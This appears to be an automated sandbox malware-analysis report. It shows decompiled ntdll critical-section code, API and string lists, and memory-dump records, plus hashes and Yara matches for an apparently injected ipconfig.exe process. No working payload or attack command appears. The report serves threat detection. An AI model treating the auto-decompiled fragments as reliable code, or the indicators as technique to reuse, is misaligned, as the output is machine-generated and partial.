                                    0x0079233f
                                    0x00000000
                                    0x0079233f
                                    0x00792291
                                    0x00792291
                                    0x00792293
                                    0x00792295
                                    0x0079229a
                                    0x007922a1
                                    0x007922a3
                                    0x007922a7
                                    0x007922a9
                                    0x00000000
                                    0x00000000
                                    0x007922ab
                                    0x007922ad
                                    0x007922af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007922af
                                    0x007922b1
                                    0x007922b4
                                    0x007922b4
                                    0x007922b6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007922b6
                                    0x0079228f
                                    0x00000000
                                    0x0079226d
                                    0x007553cb
                                    0x007553ce
                                    0x007553d0
                                    0x007553d4
                                    0x007553d6
                                    0x00000000
                                    0x007553d8
                                    0x007553e3
                                    0x007553ea
                                    0x007553ea
                                    0x007553d6
                                    0x00000000

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007922F4
                                    Strings
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007922FC
                                    • RTL: Re-Waiting, xrefs: 00792328
                                    • RTL: Resource at %p, xrefs: 0079230B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-871070163
                                    • Opcode ID: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                    • Instruction ID: 617c8ec89938efa80c4a1cb6ff93843e3e6c22bb7d26e354bf558c5284d7d131
                                    • Opcode Fuzzy Hash: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                    • Instruction Fuzzy Hash: BD513B71600701BBDF10AB28DC85FE67398AF55764F114229FD08DB282E6A9ED468790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0075EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0075EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0074DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x81793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E007316C0(_t39);
				} else {
					_t40 = E0072F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00773915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E007301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x81793c; // 0x0
								_push(_t85);
								_t44 = E00731F28(_t71);
							} else {
								_t44 = E0072F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00773915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E007B2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0075EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00774FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00783F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00783F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x8120c0;
								if(_t85 != 0x8120c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E007B217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00783F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                    0x0075ec56
                                    0x0075ec56
                                    0x0075ec56
                                    0x0075ec5c
                                    0x0075ec64
                                    0x007923e6
                                    0x007923eb
                                    0x007923eb
                                    0x0075ec6a
                                    0x0075ec6c
                                    0x0075ec6f
                                    0x007923f3
                                    0x007923f8
                                    0x007923fa
                                    0x007923fc
                                    0x0075ec75
                                    0x0075ec76
                                    0x0075ec76
                                    0x0075ec7b
                                    0x0075ec7c
                                    0x0075ec7e
                                    0x00792406
                                    0x00792407
                                    0x0079240c
                                    0x0079240d
                                    0x0079240d
                                    0x0079240d
                                    0x00792414
                                    0x00792417
                                    0x0079241e
                                    0x00792435
                                    0x00792438
                                    0x0079243c
                                    0x0079243f
                                    0x00792442
                                    0x00792443
                                    0x00792446
                                    0x00792449
                                    0x00792453
                                    0x00792455
                                    0x0079245b
                                    0x0079245b
                                    0x0075eb99
                                    0x0075eb99
                                    0x0075eb9c
                                    0x0075eb9d
                                    0x0075eb9f
                                    0x0075eba2
                                    0x00792465
                                    0x0079246b
                                    0x0079246d
                                    0x0075eba8
                                    0x0075eba9
                                    0x0075eba9
                                    0x0075ebae
                                    0x0075ebb3
                                    0x0075ebb9
                                    0x0075ebbb
                                    0x00792513
                                    0x00792514
                                    0x00792519
                                    0x0079251b
                                    0x0075ec2a
                                    0x0075ec2d
                                    0x0075ec33
                                    0x0075ec36
                                    0x0075ec3a
                                    0x0075ec3e
                                    0x0075ec40
                                    0x0075ec47
                                    0x0075ec47
                                    0x0075ec40
                                    0x007322c6
                                    0x0075ebc1
                                    0x0075ebc1
                                    0x0075ebc5
                                    0x0075ec9a
                                    0x0075ec9a
                                    0x0075ebd6
                                    0x0075ebd6
                                    0x00000000
                                    0x0075ebbb
                                    0x00792477
                                    0x0079247c
                                    0x00792486
                                    0x0079248b
                                    0x00792496
                                    0x0079249b
                                    0x0079249d
                                    0x007924a0
                                    0x007924a3
                                    0x007924aa
                                    0x007924aa
                                    0x007924a5
                                    0x007924a5
                                    0x007924a5
                                    0x007924ac
                                    0x007924af
                                    0x007924b0
                                    0x007924b3
                                    0x007924b9
                                    0x007924ba
                                    0x007924bb
                                    0x007924c6
                                    0x007924cb
                                    0x007924cd
                                    0x007924d0
                                    0x007924d1
                                    0x007924d4
                                    0x007924d6
                                    0x007924d9
                                    0x007924d9
                                    0x007924dc
                                    0x007924df
                                    0x007924e1
                                    0x007924e7
                                    0x007924e9
                                    0x007924ec
                                    0x007924ef
                                    0x007924f2
                                    0x007924f2
                                    0x007924ef
                                    0x007924e7
                                    0x007924fa
                                    0x007924ff
                                    0x00792501
                                    0x00792503
                                    0x00792506
                                    0x0079250b
                                    0x0075eb8c
                                    0x0075eb93
                                    0x00000000
                                    0x00000000
                                    0x0075eb93
                                    0x00000000
                                    0x0075eb99
                                    0x0075ec85
                                    0x0075ec85
                                    0x0075ec85
                                    0x00000000

                                    Strings
                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007924BD
                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0079248D
                                    • RTL: Re-Waiting, xrefs: 007924FA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                    • API String ID: 0-3177188983
                                    • Opcode ID: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                    • Instruction ID: ccecc2dcbb6b071fd3e107c012a6e81c582c39697ccf4ca897e8668307f5a3c1
                                    • Opcode Fuzzy Hash: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                    • Instruction Fuzzy Hash: 7D41D8B0600204FBDB24EB68DC89FAA77B9EF44710F208615F955D72D2D67CED528760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0076FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __fassign
                                    • String ID:
                                    • API String ID: 3965848254-0
                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                    • Instruction ID: 3c123995bb8216e2d328b87d6bbdc2c6c000a0e32058bc97e5d35d372c73db28
                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                    • Instruction Fuzzy Hash: CF91D671E0020AEFDF24DF58D8456EEBBB4FF55304F24807AD842A7162E7395A51CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007AE759, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007AE893
                                    • ]x, xrefs: 007AE75B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcstoul
                                    • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]x
                                    • API String ID: 1097018459-3343864547
                                    • Opcode ID: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                    • Instruction ID: bd677a5325f568174c220776ac0db13bf5c9d48c7bc308bd63513658312d371a
                                    • Opcode Fuzzy Hash: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                    • Instruction Fuzzy Hash: D441B172C00249EADF10DFE4C885BEEB7B8AF86310F10966AF551A7081E77CDA94C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0076FE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0076FED6: ___swprintf_l.LIBCMT ref: 0076FEFD
                                    • ___swprintf_l.LIBCMT ref: 0079EA87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: 4b}w$:%u
                                    • API String ID: 48624451-1257435289
                                    • Opcode ID: eb49a84f0c9b27260e6040203c8d652fd1e1a8a148caa067070e87cdb7121b30
                                    • Instruction ID: 252c8d53b52e6a56a6da20e75630475ab59bfc75f123f603cda2a93eb1002a09
                                    • Opcode Fuzzy Hash: eb49a84f0c9b27260e6040203c8d652fd1e1a8a148caa067070e87cdb7121b30
                                    • Instruction Fuzzy Hash: 8211D672500219EBCB10DE64EC449FFBBACFB54700B54452AFC56C3152E739E904CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0076C558, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0076C5BB
                                    • 1s, xrefs: 0076C56F
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: 1s${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                    • API String ID: 48624451-1946412030
                                    • Opcode ID: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
                                    • Instruction ID: 7ac45f81307a6df3911eb3b7c5e6960220cc8496fe21478108cd81518d30aade
                                    • Opcode Fuzzy Hash: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
                                    • Instruction Fuzzy Hash: 100161A60085B065D72187AB4C11832FBF99FCEA15728C08EF6D98A296E17FC542D770
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007AE8DB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcstoul.LIBCMT ref: 007AE901
                                      • Part of subcall function 007E5AA6: __cftof.LIBCMT ref: 007E5AB6
                                    Strings
                                    • ]x, xrefs: 007AE8E3
                                    • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007AE91B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __cftof_wcstoul
                                    • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]x
                                    • API String ID: 1831096779-1492471241
                                    • Opcode ID: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
                                    • Instruction ID: 8c3ae768993fb968cd615eb077720415bb297a59bf99a083496460f99a0ec5ba
                                    • Opcode Fuzzy Hash: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
                                    • Instruction Fuzzy Hash: E4F0F637140208BADB142A55DC07E9B77ACDFD5B20F008219FA059A092EAB9EA0087A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: ipconfig.exe PID: 3036 Parent PID: 1388 ipconfig.exeCOMMON

                                    Executed Functions

                                    Function 008E67C7, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 487nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryInformationProcess.NTDLL ref: 008E691F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: InformationProcessQuery
                                    • String ID: 0
                                    • API String ID: 1778838933-4108050209
                                    • Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                    • Instruction ID: 3f6d07d44de5e64294e1767db082110495752c6663fffbfd892c5b28dc02f650
                                    • Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                    • Instruction Fuzzy Hash: CCF14270518A8C8FDB69EF69C895AEEB7E0FF99300F50462AE44EC7251DF349541CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008E632E, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 226nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: Section$CloseCreateView
                                    • String ID: @$@
                                    • API String ID: 1133238012-149943524
                                    • Opcode ID: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                    • Instruction ID: 7f2cdce07968300629ca2434af62bda0cd86892caae400c9b24335ae5c05e35a
                                    • Opcode Fuzzy Hash: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                    • Instruction Fuzzy Hash: 2761937061CB498FCB58DF5CD8856AAB7E0FB98314F50062EE58AC3291DF75D441CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008E6332, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: Section$CreateView
                                    • String ID: @$@
                                    • API String ID: 1585966358-149943524
                                    • Opcode ID: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                    • Instruction ID: 25052761413864b1efd58609df1a863a9a44fd41518897b5db5f5072f75f44c7
                                    • Opcode Fuzzy Hash: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                    • Instruction Fuzzy Hash: 77517E7061CB498FC758DF18D8956AABBE0FB98304F50062EF98AC3691DF35D581CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008E67C2, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtQueryInformationProcess.NTDLL ref: 008E691F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: InformationProcessQuery
                                    • String ID: 0
                                    • API String ID: 1778838933-4108050209
                                    • Opcode ID: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                    • Instruction ID: ba4300fe68f4f57ec678ae19dac14a7dbd78ab5f32bd6de786c5c477a127f820
                                    • Opcode Fuzzy Hash: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                    • Instruction Fuzzy Hash: 5A513C70918A8C8FDB69EF69C8846EEB7F4FB99304F40462EE44AD7211DF349645CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000982AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: M;
                                    • API String ID: 2738559852-3261960221
                                    • Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                    • Instruction ID: ca783961a335ce8adc81c3e09caae813b6b837b279e20f61f7c2725457d3eefd
                                    • Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                    • Instruction Fuzzy Hash: 14110972200204AFCB14DF99CC85EEB77A9EF8C754F158659BA1D97341DA30E911CBE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000981B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: .z`
                                    • API String ID: 823142352-1441809116
                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                    • Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                    • Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000982E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID: =
                                    • API String ID: 3535843008-3560468456
                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                    • Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                    • Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00098260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                    • Instruction ID: bed45cf130e08865842418422f5209c84d04630db3e9acde41b4be393811b9d6
                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                    • Instruction Fuzzy Hash: 6CF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022B00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
